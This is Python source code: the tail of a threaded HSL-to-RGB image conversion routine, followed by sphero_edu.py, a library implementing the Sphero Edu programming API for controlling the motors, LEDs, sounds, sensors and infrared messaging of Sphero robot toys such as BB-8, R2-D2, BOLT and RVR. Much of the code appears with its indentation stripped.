def calc_channel(channel, t):
t[t < 0] += 1
t[t > 1] -= 1
t_lt_per_6 = t < per_6
t_lt_half = (t_lt_per_6 == False) * (t < 0.5)
t_lt_two_per_3 = (t_lt_half == False) * (t < two_per_3)
t_mul_6 = t * 6
channel[:] = p.copy()
channel[t_lt_two_per_3] = p[t_lt_two_per_3] + q_sub_p[t_lt_two_per_3] * (4 - t_mul_6[t_lt_two_per_3])
channel[t_lt_half] = q[t_lt_half].copy()
channel[t_lt_per_6] = p[t_lt_per_6] + q_sub_p[t_lt_per_6] * t_mul_6[t_lt_per_6]
channel[is_s_zero] = l_is_s_zero.copy()
calc_channel(fr, h + per_3)
calc_channel(fg, h.copy())
calc_channel(fb, h - per_3)
    frgb = np.zeros(hsl.shape, dtype=np.float64)
cpus = multiprocessing.cpu_count()
length = int(math.ceil(float(hsl.shape[0]) / cpus))
line = 0
threads = []
while line < hsl.shape[0]:
line_next = line + length
thread = threading.Thread(target=core, args=(hsl[line:line_next], frgb[line:line_next]))
thread.start()
threads.append(thread)
line = line_next
for thread in threads:
thread.join()
return (frgb*255).round().astype(np.uint8)
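# Minimal self-check (a sketch): round-trip a random RGB image through HSL and back; the
# conversion is lossy only through rounding, so the per-channel error should stay small.
if __name__ == '__main__':
    rgb = np.random.randint(0, 256, (64, 64, 3), dtype=np.uint8)
    restored = hsl2rgb(rgb2hsl(rgb))
    print('max round-trip error:', int(np.abs(rgb.astype(np.int16) - restored.astype(np.int16)).max()))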
|
sphero_edu.py
|
import math
import threading
import time
from collections import namedtuple, defaultdict
from enum import Enum, IntEnum, auto
from functools import partial
from typing import Union, Callable, Dict, Iterable
import numpy as np
from transforms3d.euler import euler2mat
from spherov2.commands.animatronic import R2LegActions
from spherov2.commands.io import IO
from spherov2.commands.power import BatteryVoltageAndStateStates
from spherov2.controls import RawMotorModes
from spherov2.helper import bound_value, bound_color
from spherov2.toy import Toy
from spherov2.toy.bb8 import BB8
from spherov2.toy.bb9e import BB9E
from spherov2.toy.bolt import BOLT
from spherov2.toy.mini import Mini
from spherov2.toy.ollie import Ollie
from spherov2.toy.r2d2 import R2D2
from spherov2.toy.r2q5 import R2Q5
from spherov2.toy.rvr import RVR
from spherov2.toy.sphero import Sphero
from spherov2.types import Color
from spherov2.utils import ToyUtil
class Stance(str, Enum):
Bipod = 'twolegs'
Tripod = 'threelegs'
class EventType(Enum):
on_collision = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_freefall = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_landing = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_gyro_max = auto() # [f.Sphero, f.Mini, f.Ollie, f.BB8, f.BB9E, f.BOLT, f.Mini]
on_charging = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT]
on_not_charging = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT]
on_ir_message = auto() # [f.BOLT, f.RVR] TODO
on_color = auto() # [f.RVR] TODO
class LedManager:
def __init__(self, cls):
if cls is RVR:
self.__mapping = {
'front': ('left_headlight', 'right_headlight'),
'main': ('left', 'right', 'front', 'back')
}
elif cls in (R2D2, R2Q5, BOLT):
self.__mapping = {'main': ('front', 'back')}
else:
self.__mapping = {}
self.__leds = defaultdict(partial(Color, 0, 0, 0))
def __setitem__(self, key, value):
if key in self.__mapping:
for led in self.__mapping[key]:
self.__setitem__(led, value)
else:
self.__leds[key] = value
def __getitem__(self, item):
if item in self.__mapping:
return self.__getitem__(self.__mapping[item][0])
return self.__leds[item]
def get(self, item, default):
if item in self.__mapping:
return self.get(self.__mapping[item][0], default)
return self.__leds.get(item, default)
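# Example (a sketch): LED groups fan writes out to their member LEDs, and reads return the
# first member of the group, so setting 'front' on an RVR updates both headlights:
#   leds = LedManager(RVR)
#   leds['front'] = Color(255, 0, 0)
#   leds['left_headlight']   # -> Color(r=255, g=0, b=0)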
class SpheroEduAPI:
"""Implementation of Sphero Edu Javascript APIs: https://sphero.docsapp.io/docs/get-started"""
def __init__(self, toy: Toy):
self.__toy = toy
self.__heading = 0
self.__speed = 0
self.__stabilization = True
self.__raw_motor = namedtuple('rawMotor', ('left', 'right'))(0, 0)
self.__leds = LedManager(toy.__class__)
self.__sensor_data: Dict[str, Union[float, Dict[str, float]]] = {'distance': 0., 'color_index': -1}
self.__sensor_name_mapping = {}
self.__last_location = (0., 0.)
self.__last_non_fall = time.time()
self.__falling_v = 1.
self.__last_message = None
self.__should_land = self.__free_falling = False
ToyUtil.add_listeners(toy, self)
self.__listeners = defaultdict(set)
self.__stopped = threading.Event()
self.__stopped.set()
self.__updating = threading.Lock()
self.__thread = None
def __enter__(self):
self.__stopped.clear()
self.__thread = threading.Thread(target=self.__background)
self.__toy.__enter__()
self.__thread.start()
try:
self.__toy.wake()
ToyUtil.set_robot_state_on_start(self.__toy)
self.__start_capturing_sensor_data()
except:
self.__exit__(None, None, None)
raise
return self
def __exit__(self, *args):
self.__stopped.set()
self.__thread.join()
try:
ToyUtil.sleep(self.__toy)
except:
pass
self.__toy.__exit__(*args)
def __background(self):
while not self.__stopped.wait(0.8):
with self.__updating:
self.__update_speeds()
def _will_sleep_notify(self):
ToyUtil.ping(self.__toy)
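    # Typical usage (a sketch; assumes a connected Toy obtained elsewhere, e.g. via the
    # spherov2 scanner): the API is a context manager that wakes the toy on entry and puts
    # it to sleep on exit.
    #   with SpheroEduAPI(toy) as droid:
    #       droid.set_main_led(Color(0, 255, 0))
    #       droid.roll(0, 100, 2)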
# Movements: control the robot's motors and control system.
def __update_speeds(self):
if self.__speed != 0:
self.__update_speed()
if self.__raw_motor.left != 0 or self.__raw_motor.right != 0:
self.__update_raw_motor()
def __stop_all(self):
if self.__speed != 0:
self.__speed = 0
self.__update_speed()
if self.__raw_motor.left != 0 or self.__raw_motor.right != 0:
            self.__raw_motor = self.__raw_motor._replace(left=0, right=0)
self.__update_raw_motor()
def roll(self, heading: int, speed: int, duration: float):
"""Combines heading(0-360°), speed(-255-255), and duration to make the robot roll with one line of code.
For example, to have the robot roll at 90°, at speed 200 for 2s, use ``roll(90, 200, 2)``"""
if isinstance(self.__toy, Mini) and speed != 0:
speed = round((speed + 126) * 2 / 3) if speed > 0 else round((speed - 126) * 2 / 3)
self.__speed = bound_value(-255, speed, 255)
self.__heading = heading % 360
if speed < 0:
self.__heading = (self.__heading + 180) % 360
self.__update_speed()
time.sleep(duration)
self.stop_roll()
def __update_speed(self):
ToyUtil.roll_start(self.__toy, self.__heading, self.__speed)
def set_speed(self, speed: int):
"""Sets the speed of the robot from -255 to 255, where positive speed is forward, negative speed is backward,
and 0 is stopped. Each robot type translates this value differently into a real world speed;
Ollie is almost three times faster than Sphero. For example, use ``set_speed(188)`` to set the speed to 188
which persists until you set a different speed. You can also read the real-time velocity value in centimeters
per second reported by the motor encoders.
"""
if isinstance(self.__toy, Mini) and speed != 0:
speed = round((speed + 126) * 2 / 3) if speed > 0 else round((speed - 126) * 2 / 3)
self.__speed = bound_value(-255, speed, 255)
self.__update_speed()
def stop_roll(self, heading: int = None):
"""Sets the speed to zero to stop the robot, effectively the same as the ``set_speed(0)`` command."""
if heading is not None:
self.__heading = heading % 360
self.__speed = 0
ToyUtil.roll_stop(self.__toy, self.__heading, False)
def set_heading(self, heading: int):
"""Sets the direction the robot rolls.
Assuming you aim the robot with the blue tail light facing you, then 0° is forward, 90° is right,
270° is left, and 180° is backward. For example, use ``set_heading(90)`` to face right."""
self.__heading = heading % 360
ToyUtil.roll_start(self.__toy, self.__heading, self.__speed)
def spin(self, angle: int, duration: float):
"""Spins the robot for a given number of degrees over time, with 360° being a single revolution.
For example, to spin the robot 360° over 1s, use: ``spin(360, 1)``.
        Use :func:`set_speed` prior to :func:`spin` to have the robot move in a circle or an arc.
Note: Unlike official API, performance of spin is guaranteed, but may be longer than the specified duration."""
if angle == 0:
return
time_pre_rev = .45
if isinstance(self.__toy, RVR):
time_pre_rev = 1.5
elif isinstance(self.__toy, (R2D2, R2Q5)):
time_pre_rev = .7
elif isinstance(self.__toy, Mini):
time_pre_rev = .5
elif isinstance(self.__toy, Ollie):
time_pre_rev = .6
abs_angle = abs(angle)
duration = max(duration, time_pre_rev * abs_angle / 360)
start = time.time()
angle_gone = 0
with self.__updating:
while angle_gone < abs_angle:
delta = round(min((time.time() - start) / duration, 1.) * abs_angle) - angle_gone
self.set_heading(self.__heading + delta if angle > 0 else self.__heading - delta)
angle_gone += delta
def set_stabilization(self, stabilize: bool):
"""Turns the stabilization system on and ``set_stabilization(false)`` turns it off.
Stabilization is normally on to keep the robot upright using the Inertial Measurement Unit (IMU),
a combination of readings from the Accelerometer (directional acceleration), Gyroscope (rotation speed),
and Encoders (location and distance). When ``set_stabilization(false)`` and you power the motors,
the robot will not balance, resulting in possible unstable behaviors like wobbly driving,
or even jumping if you set the power very high. Some use cases to turn it off are:
1. Jumping: Set Motor Power to max values and the robot will jump off the ground!
        2. Gyro: Programs like the Spinning Top where you want to isolate the Gyroscope readings rather than having
the robot auto balance inside the shell.
When stabilization is off you can't use :func:`set_speed` to set a speed because it requires the control system
to be on to function. However, you can control the motors using Motor Power with :func:`raw_motor` when
the control system is off."""
self.__stabilization = stabilize
if isinstance(self.__toy, (Sphero, Mini, Ollie, BB8, BB9E, BOLT)):
ToyUtil.set_stabilization(self.__toy, stabilize)
def __update_raw_motor(self):
ToyUtil.set_raw_motor(self.__toy,
RawMotorModes.REVERSE if self.__raw_motor.left < 0 else RawMotorModes.FORWARD,
abs(self.__raw_motor.left),
RawMotorModes.REVERSE if self.__raw_motor.right < 0 else RawMotorModes.FORWARD,
abs(self.__raw_motor.right))
def raw_motor(self, left: int, right: int, duration: float):
"""Controls the electrical power sent to the left and right motors independently, on a scale from -255 to 255
where positive is forward, negative is backward, and 0 is stopped. If you set both motors to full power
the robot will jump because stabilization (use of the IMU to keep the robot upright) is disabled when using
this command. This is different from :func:`set_speed` because Raw Motor sends an "Electromotive force"
to the motors, whereas Set Speed is a target speed measured by the encoders. For example, to set the raw motor
to full power for 4s, making the robot jump off the ground, use ``raw_motor(255, 255, 4)``."""
stabilize = self.__stabilization
if stabilize:
self.set_stabilization(False)
        self.__raw_motor = self.__raw_motor._replace(left=bound_value(-255, left, 255),
                                                     right=bound_value(-255, right, 255))
self.__update_raw_motor()
if duration is not None:
time.sleep(duration)
if stabilize:
self.set_stabilization(True)
            self.__raw_motor = self.__raw_motor._replace(left=0, right=0)
ToyUtil.set_raw_motor(self.__toy, RawMotorModes.OFF, 0, RawMotorModes.OFF, 0)
def reset_aim(self):
"""Resets the heading calibration (aim) angle to use the current direction of the robot as 0°."""
ToyUtil.reset_heading(self.__toy)
# Star Wars Droid Movements
def play_animation(self, animation: IntEnum):
"""Plays iconic `Star Wars Droid animations <https://edu.sphero.com/remixes/1195472/>`_ unique to BB-8, BB-9E,
R2-D2 and R2-Q5 that combine movement, lights and sound. All animation enums can be accessed under the droid
class, such as :class:`R2D2.Animations.CHARGER_1`."""
if hasattr(self.__toy, 'Animations'):
if animation not in self.__toy.Animations:
raise ValueError(f'Animation {animation} cannot be played by this toy')
with self.__updating:
self.__stop_all()
ToyUtil.play_animation(self.__toy, animation, True)
# The R2-D2 and R2-Q5 Droids are physically different from other Sphero robots,
# so there are some unique commands that only they can use.
def set_dome_position(self, angle: float):
"""Rotates the dome on its axis, from -160° to 180°. For example, set to 45° using ``set_dome_position(45).``"""
if isinstance(self.__toy, (R2D2, R2Q5)):
ToyUtil.set_head_position(self.__toy, bound_value(-160., angle, 180.))
def set_stance(self, stance: Stance):
"""Changes the stance between bipod and tripod. Set to bipod using ``set_stance(Stance.Bipod)`` and
to tripod using ``set_stance(Stance.Tripod)``. Tripod is required for rolling."""
if isinstance(self.__toy, (R2D2, R2Q5)):
if stance == Stance.Bipod:
ToyUtil.perform_leg_action(self.__toy, R2LegActions.TWO_LEGS)
elif stance == Stance.Tripod:
ToyUtil.perform_leg_action(self.__toy, R2LegActions.THREE_LEGS)
else:
raise ValueError(f'Stance {stance} is not supported')
def set_waddle(self, waddle: bool):
"""Turns the waddle walk on using `set_waddle(True)`` and off using ``set_waddle(False)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
with self.__updating:
self.__stop_all()
ToyUtil.perform_leg_action(self.__toy, R2LegActions.WADDLE if waddle else R2LegActions.STOP)
# Lights: control the color and brightness of LEDs on a robot.
def set_main_led(self, color: Color):
"""Changes the color of the main LED light, or the full matrix on Sphero BOLT. Set this using RGB
(red, green, blue) values on a scale of 0 - 255. For example, ``set_main_led(Color(r=90, g=255, b=90))``."""
self.__leds['main'] = bound_color(color, self.__leds['main'])
ToyUtil.set_main_led(self.__toy, **self.__leds['main']._asdict(), is_user_color=False)
def set_front_led(self, color: Color):
"""For Sphero RVR: Changes the color of RVR's front two LED headlights together.
For Sphero BOLT, R2D2, R2Q5: Changes the color of the front LED light.
Set this using RGB (red, green, blue) values on a scale of 0 - 255. For example, the magenta color is expressed
        as ``set_front_led(Color(239, 0, 255))``."""
if isinstance(self.__toy, (R2D2, R2Q5, BOLT, RVR)):
self.__leds['front'] = bound_color(color, self.__leds['front'])
ToyUtil.set_front_led(self.__toy, **self.__leds['front']._asdict())
def set_back_led(self, color: Union[Color, int]):
"""For older Sphero:
Sets the brightness of the back aiming LED, aka the "Tail Light." This LED is limited to blue only, with a
brightness scale from 0 to 255. For example, use ``set_back_led(255)`` to set the back LED to full brightness.
Use :func:`time.sleep` to set it on for a duration. For example, to create a dim and a bright blink
sequence use::
set_back_led(0) # Dim
delay(0.33)
set_back_led(255) # Bright
delay(0.33)
For Sphero BOLT, R2D2, R2Q5:
Changes the color of the back LED light. Set this using RGB (red, green, blue) values on a scale of 0 - 255.
For Sphero RVR:
        Changes the color of the left and right brake light LEDs. Set this using RGB (red, green, blue) values
on a scale of 0 - 255."""
if isinstance(color, int):
self.__leds['back'] = Color(0, 0, bound_value(0, color, 255))
ToyUtil.set_back_led_brightness(self.__toy, self.__leds['back'].b)
elif isinstance(self.__toy, (R2D2, R2Q5, BOLT, RVR)):
self.__leds['back'] = bound_color(color, self.__leds['back'])
ToyUtil.set_back_led(self.__toy, **self.__leds['back']._asdict())
def fade(self, from_color: Color, to_color: Color, duration: float):
"""Changes the main LED lights from one color to another over a period of seconds. For example, to fade from
green to blue over 3s, use: ``fade(Color(0, 255, 0), Color(0, 0, 255), 3.0)``."""
from_color = bound_color(from_color, self.__leds['main'])
to_color = bound_color(to_color, self.__leds['main'])
start = time.time()
while True:
frac = (time.time() - start) / duration
if frac >= 1:
break
self.set_main_led(Color(
r=round(from_color.r * (1 - frac) + to_color.r * frac),
g=round(from_color.g * (1 - frac) + to_color.g * frac),
b=round(from_color.b * (1 - frac) + to_color.b * frac)))
self.set_main_led(to_color)
def strobe(self, color: Color, period: float, count: int):
"""Repeatedly blinks the main LED lights. The period is the time, in seconds, the light stays on during a
single blink; cycles is the total number of blinks. The time for a single cycle is twice the period
(time for a blink plus the same amount of time for the light to be off). Another way to say this is the period
is 1/2 the time it takes for a single cycle. So, to strobe red 15 times in 3 seconds, use:
``strobe(Color(255, 57, 66), (3 / 15) * .5, 15)``."""
for i in range(count * 2):
if i & 1:
self.set_main_led(color)
else:
self.set_main_led(Color(0, 0, 0))
time.sleep(period)
# TODO Sphero BOLT Lights
# Sphero RVR Lights
def set_left_headlight_led(self, color: Color):
"""Changes the color of the front left headlight LED on RVR. Set this using RGB (red, green, blue) values on a
scale of 0 - 255. For example, the pink color is expressed as
``set_left_headlight_led(Color(253, 159, 255))``."""
if isinstance(self.__toy, RVR):
self.__leds['left_headlight'] = bound_color(color, self.__leds['left_headlight'])
ToyUtil.set_left_front_led(self.__toy, **self.__leds['left_headlight']._asdict())
def set_right_headlight_led(self, color: Color):
"""Changes the color of the front right headlight LED on RVR. Set this using RGB (red, green, blue) values on a
scale of 0 - 255. For example, the blue color is expressed as
``set_right_headlight_led(Color(0, 28, 255))``."""
if isinstance(self.__toy, RVR):
self.__leds['right_headlight'] = bound_color(color, self.__leds['right_headlight'])
ToyUtil.set_right_front_led(self.__toy, **self.__leds['right_headlight']._asdict())
def set_left_led(self, color: Color):
"""Changes the color of the LED on RVR's left side (which is the side with RVR's battery bay door). Set this
using RGB (red, green, blue) values on a scale of 0 - 255. For example, the green color is expressed as
``set_left_led(Color(0, 255, 34))``."""
if isinstance(self.__toy, RVR):
self.__leds['left'] = bound_color(color, self.__leds['left'])
ToyUtil.set_battery_side_led(self.__toy, **self.__leds['left']._asdict())
def set_right_led(self, color: Color):
"""Changes the color of the LED on RVR's right side (which is the side with RVR's power button). Set this using
RGB (red, green, blue) values on a scale of 0 - 255. For example, the red color is expressed as
``set_right_led(Color(255, 18, 0))``."""
if isinstance(self.__toy, RVR):
self.__leds['right'] = bound_color(color, self.__leds['right'])
ToyUtil.set_power_side_led(self.__toy, **self.__leds['right']._asdict())
# BB-9E Lights
def set_dome_leds(self, brightness: int):
"""Controls the brightness of the two single color LEDs (red and blue) in the dome, from 0 to 15. We don't use
0-255 for this light because it has less granular control. For example, set them to full brightness using
``set_dome_leds(15)``."""
if isinstance(self.__toy, BB9E):
self.__leds['dome'] = bound_value(0, brightness, 15)
ranged = self.__leds['dome'] * 255 // 15
ToyUtil.set_head_led(self.__toy, ranged)
# R2-D2 & R2-Q5 Lights
def set_holo_projector_led(self, brightness: int):
"""Changes the brightness of the Holographic Projector white LED, from 0 to 255. For example, set it to full
brightness using ``set_holo_projector_led(255)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
self.__leds['holo_projector'] = bound_value(0, brightness, 255)
ToyUtil.set_holo_projector(self.__toy, self.__leds['holo_projector'])
def set_logic_display_leds(self, brightness: int):
"""Changes the brightness of the Logic Display LEDs, from 0 to 255. For example, set it to full brightness
using ``set_logic_display_leds(255)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
self.__leds['logic_display'] = bound_value(0, brightness, 255)
ToyUtil.set_logic_display(self.__toy, self.__leds['logic_display'])
# Sounds: Control sounds and words which can play from your programming device's speaker or the robot.
def play_sound(self, sound: IntEnum):
"""Unique Star Wars Droid Sounds are available for BB-8, BB-9E and R2-D2. For example, to play the R2-D2 Burnout
sound use ``play_sound(R2D2.Audio.R2_BURNOUT)``."""
if hasattr(self.__toy, 'Audio'):
if sound not in self.__toy.Audio:
raise ValueError(f'Sound {sound} cannot be played by this toy')
ToyUtil.play_sound(self.__toy, sound, False)
# Sensors: Querying sensor data allows you to react to real-time values coming from the robots' physical sensors.
def __start_capturing_sensor_data(self):
if isinstance(self.__toy, RVR):
sensors = ['accelerometer', 'gyroscope', 'imu', 'locator', 'velocity', 'ambient_light', 'color_detection']
self.__sensor_name_mapping['imu'] = 'attitude'
elif isinstance(self.__toy, BOLT):
sensors = ['accelerometer', 'gyroscope', 'attitude', 'locator', 'velocity', 'ambient_light']
else:
sensors = ['attitude', 'accelerometer', 'gyroscope', 'locator', 'velocity']
ToyUtil.enable_sensors(self.__toy, sensors)
def _sensor_data_listener(self, sensor_data: Dict[str, Dict[str, float]]):
for sensor, data in sensor_data.items():
if sensor in self.__sensor_name_mapping:
self.__sensor_data[self.__sensor_name_mapping[sensor]] = data
else:
self.__sensor_data[sensor] = data
if 'attitude' in self.__sensor_data and 'accelerometer' in self.__sensor_data:
att = self.__sensor_data['attitude']
r = euler2mat(*np.deg2rad((att['roll'], att['pitch'], att['yaw'])), axes='szxy')
acc = self.__sensor_data['accelerometer']
self.__sensor_data['vertical_accel'] = -np.matmul(np.linalg.inv(r), (acc['x'], -acc['z'], acc['y']))[1]
self.__process_falling(self.__sensor_data['vertical_accel'])
if 'locator' in self.__sensor_data:
cur_loc = self.__sensor_data['locator']
cur_loc = (cur_loc['x'], cur_loc['y'])
self.__sensor_data['distance'] += math.hypot(cur_loc[0] - self.__last_location[0],
cur_loc[1] - self.__last_location[1])
self.__last_location = cur_loc
if 'color_detection' in self.__sensor_data:
color = self.__sensor_data['color_detection']
index = color['index']
if index != self.__sensor_data['color_index'] and index < 255 and color['confidence'] >= 0.71:
self.__sensor_data['color_index'] = index
self.__call_event_listener(EventType.on_color, Color(int(color['r']), int(color['g']), int(color['b'])))
def __process_falling(self, a):
self.__falling_v = (self.__falling_v + a * 3) / 4
cur = time.time()
if (-.5 < self.__falling_v < .5) if self.__stabilization else (-.1 < a < .1):
if cur - self.__last_non_fall > .2 and not self.__free_falling:
self.__call_event_listener(EventType.on_freefall)
self.__free_falling = True
self.__should_land = True
else:
self.__last_non_fall = cur
self.__free_falling = False
if self.__should_land and (
(self.__falling_v < -1.1 or self.__falling_v > 1.1) if self.__stabilization else (a < -.8 or a > .8)):
self.__call_event_listener(EventType.on_landing)
self.__should_land = False
def _collision_detected_notify(self, args):
self.__call_event_listener(EventType.on_collision)
def _battery_state_changed_notify(self, state: BatteryVoltageAndStateStates):
if state == BatteryVoltageAndStateStates.CHARGED or state == BatteryVoltageAndStateStates.CHARGING:
self.__call_event_listener(EventType.on_charging)
else:
self.__call_event_listener(EventType.on_not_charging)
def _gyro_max_notify(self, flags):
self.__call_event_listener(EventType.on_gyro_max)
def get_acceleration(self):
"""Provides motion acceleration data along a given axis measured by the Accelerometer, in g's, where g =
9.80665 m/s^2.
``get_acceleration()['x']`` is the left-to-right acceleration, from -8 to 8 g's.
``get_acceleration()['y']`` is the forward-to-back acceleration, from -8 to 8 g's.
``get_acceleration()['z']`` is the upward-to-downward acceleration, from -8 to 8 g's."""
return self.__sensor_data.get('accelerometer', None)
def get_vertical_acceleration(self):
"""This is the upward or downward acceleration regardless of the robot's orientation, from -8 to 8 g's."""
return self.__sensor_data.get('vertical_accel', None)
def get_orientation(self):
"""Provides the tilt angle along a given axis measured by the Gyroscope, in degrees.
``get_orientation()['pitch']`` is the forward or backward tilt angle, from -180° to 180°.
``get_orientation()['roll']`` is the left or right tilt angle, from -90° to 90°.
``get_orientation()['yaw']`` is the spin (twist) angle, from -180° to 180°."""
return self.__sensor_data.get('attitude', None)
def get_gyroscope(self):
"""Provides the rate of rotation around a given axis measured by the gyroscope, from -2,000° to 2,000°
per second.
``get_gyroscope()['pitch']`` is the rate of forward or backward spin, from -2,000° to 2,000° per second.
``get_gyroscope()['roll']`` is the rate of left or right spin, from -2,000° to 2,000° per second.
``get_gyroscope()['yaw']`` is the rate of sideways spin, from -2,000° to 2,000° per second."""
return self.__sensor_data.get('gyroscope', None)
def get_velocity(self):
"""Provides the velocity along a given axis measured by the motor encoders, in centimeters per second.
``get_velocity()['x']`` is the right (+) or left (-) velocity, in centimeters per second.
``get_velocity()['y']`` is the forward (+) or back (-) velocity, in centimeters per second."""
return self.__sensor_data.get('velocity', None)
def get_location(self):
"""Provides the location where the robot is in space (x,y) relative to the origin, in centimeters. This is not
the distance traveled during the program, it is the offset from the origin (program start).
``get_location()['x']`` is the right (+) or left (-) distance from the origin of the program start, in
centimeters.
``get_location()['y']`` is the forward (+) or backward (-) distance from the origin of the program start, in
centimeters."""
return self.__sensor_data.get('locator', None)
def get_distance(self):
"""Provides the total distance traveled in the program, in centimeters."""
return self.__sensor_data.get('distance', None)
def get_speed(self):
"""Provides the current target speed of the robot, from -255 to 255, where positive is forward, negative is
backward, and 0 is stopped."""
return self.__speed
def get_heading(self):
"""Provides the target directional angle, in degrees. Assuming you aim the robot with the tail facing you,
then 0° heading is forward, 90° is right, 180° is backward, and 270° is left."""
return self.__heading
def get_main_led(self):
"""Provides the RGB color of the main LEDs, from 0 to 255 for each color channel.
``get_main_led().r`` is the red channel, from 0 - 255.
``get_main_led().g`` is the green channel, from 0 - 255.
``get_main_led().b`` is the blue channel, from 0 - 255."""
return self.__leds.get('main', None)
# Sphero BOLT Sensors
# TODO Compass Direction
def get_luminosity(self):
"""Provides the light intensity from 0 - 100,000 lux, where 0 lux is full darkness and 30,000-100,000 lux is
direct sunlight. You may need to adjust a condition based on luminosity in different environments as light
intensity can vary greatly between rooms."""
return self.__sensor_data.get('ambient_light', None)
def get_last_ir_message(self):
"""Returns which channel the last infrared message was received on. You need to declare the ``on_ir_message``
event for each IR message you plan to see returned."""
return self.__last_message
def get_back_led(self):
"""Provides the RGB color of the back LED, from 0 to 255 for each color channel."""
return self.__leds.get('back', None)
def get_front_led(self):
"""Provides the RGB color of the front LED, from 0 to 255 for each color channel."""
return self.__leds.get('front', None)
# Sphero RVR Sensors
def get_color(self):
"""Provides the RGB color, from 0 to 255 for each color channel, that is returned from RVR's color sensor.
``get_color().r`` is the red channel, from 0 - 255, that is returned from RVR's color sensor.
``get_color().g`` is the green channel, from 0 - 255, that is returned from RVR's color sensor.
``get_color().b`` is the blue channel, from 0 - 255, that is returned from RVR's color sensor."""
if 'color_detection' in self.__sensor_data:
color = self.__sensor_data['color_detection']
return Color(round(color['r']), round(color['g']), round(color['b']))
return None
# BB-9E Sensors
def get_dome_leds(self):
"""Provides the brightness of the Dome LEDs, from 0 to 15."""
return self.__leds.get('dome', None)
# R2-D2 & R2-Q5 Sensors
def get_holo_projector_led(self):
"""Provides the brightness of the Holographic Projector LED, from 0 to 255."""
return self.__leds.get('holo_projector', None)
def get_logic_display_leds(self):
"""Provides the brightness of the white Logic Display LEDs, from 0 to 255."""
return self.__leds.get('logic_display', None)
# Communications
def start_ir_broadcast(self, near: int, far: int):
"""Sets the IR emitters to broadcast on two specified channels, from 0 to 7, so other BOLTs can follow or evade.
The broadcaster uses two channels because the first channel emits near IR pulses (< 1 meter), and the second
channel emits far IR pulses (1 to 3 meters) so the following and evading BOLTs can detect these messages on
their IR receivers with a sense of relative proximity to the broadcaster. You can't use a channel for more than
one purpose at a time, such as sending messages along with broadcasting, following, or evading. For example,
use ``start_ir_broadcast(0, 1)`` to broadcast on channels 0 and 1, so that other BOLTs following or evading on
0 and 1 will recognize this robot."""
ToyUtil.start_robot_to_robot_infrared_broadcasting(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_broadcast(self):
"""Stops the broadcasting behavior."""
ToyUtil.stop_robot_to_robot_infrared_broadcasting(self.__toy)
def start_ir_follow(self, near: int, far: int):
"""Sets the IR receivers to look for broadcasting BOLTs on the same channel pair, from 0 to 7. Upon receiving
messages from a broadcasting BOLT, the follower will adjust its heading and speed to follow the broadcaster.
When a follower loses sight of a broadcaster, the follower will spin in place to search for the broadcaster.
You can't use a channel for more than one purpose at a time, such as sending messages along with broadcasting,
following, or evading. For example, use ``start_ir_follow(0, 1)`` to follow another BOLT that is broadcasting on
channels 0 and 1."""
ToyUtil.start_robot_to_robot_infrared_following(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_follow(self):
"""Stops the following behavior."""
ToyUtil.stop_robot_to_robot_infrared_following(self.__toy)
def start_ir_evade(self, near: int, far: int):
"""Sets the IR receivers to look for broadcasting BOLTs on the same channel pair, from 0 to 7. Upon receiving
messages from a broadcasting BOLT, the evader will adjust its heading to roll away from the broadcaster.
When an evader loses sight of a broadcaster, the evader will spin in place to search for the broadcaster.
The evader may stop if it is in the far range for a period of time so it does not roll too far away from the
broadcaster. You can't use a channel for more than one purpose at a time, such as sending messages along with
broadcasting, following, or evading. For example, use ``start_ir_evade(0, 1)`` to evade another BOLT that is
broadcasting on channels 0 and 1."""
ToyUtil.start_robot_to_robot_infrared_evading(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_evade(self):
"""Stops the evading behavior."""
ToyUtil.stop_robot_to_robot_infrared_evading(self.__toy)
def send_ir_message(self, channel: int, intensity: int):
"""Sends a message on a given IR channel, at a set intensity, from 1 to 64. Intensity is proportional to
proximity, where a 1 is the closest, and 64 is the farthest. For example, use ``send_ir_message(4, 5)`` to send
message 4 at intensity 5. You will need to use ``onIRMessage4(channel)`` event for on a corresponding robot to
receive the message. Also see the ``getLastIRMessage()`` sensor to keep track of the last message your robot
received. You can't use a channel for more than one purpose at time, such as sending messages along with
broadcasting, following, or evading."""
ToyUtil.send_robot_to_robot_infrared_message(
self.__toy, bound_value(0, channel, 7), bound_value(1, intensity, 64))
def listen_for_ir_message(self, channels: Union[int, Iterable[int]], duration: int = 0xFFFFFFFF):
if isinstance(channels, int):
channels = (channels,)
if len(channels) > 0:
ToyUtil.listen_for_robot_to_robot_infrared_message(
self.__toy, map(lambda v: bound_value(0, v, 7), channels), bound_value(0, duration, 0xFFFFFFFF))
def _robot_to_robot_infrared_message_received_notify(self, infrared_code: int):
self.__last_message = infrared_code
self.__call_event_listener(EventType.on_ir_message, infrared_code)
def listen_for_color_sensor(self, colors: Iterable[Color]):
if self.__toy.implements(IO.set_active_color_palette):
palette = []
for i, color in enumerate(colors):
palette.extend((i, color.r, color.g, color.b))
if palette:
self.__toy.set_active_color_palette(palette)
# Events: are predefined robot functions into which you can embed conditional logic. When an event occurs, the
# conditional logic is called and then the program returns to the main loop where it left off. The event will
# be called every time it occurs by default, unless you customize it.
def __call_event_listener(self, event_type: EventType, *args, **kwargs):
for f in self.__listeners[event_type]:
threading.Thread(target=f, args=(self, *args), kwargs=kwargs).start()
def register_event(self, event_type: EventType, listener: Callable[..., None]):
"""Registers the event type with listener. If listener is ``None`` then it removes all listeners of the
specified event type.
**Note**: listeners will be called in a newly spawned thread, meaning the caller has to deal with concurrency
if needed. This library is thread-safe."""
if event_type not in EventType:
raise ValueError(f'Event type {event_type} does not exist')
if listener:
self.__listeners[event_type].add(listener)
else:
del self.__listeners[event_type]
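# --- Usage sketch (added for illustration; not part of the original file) ---
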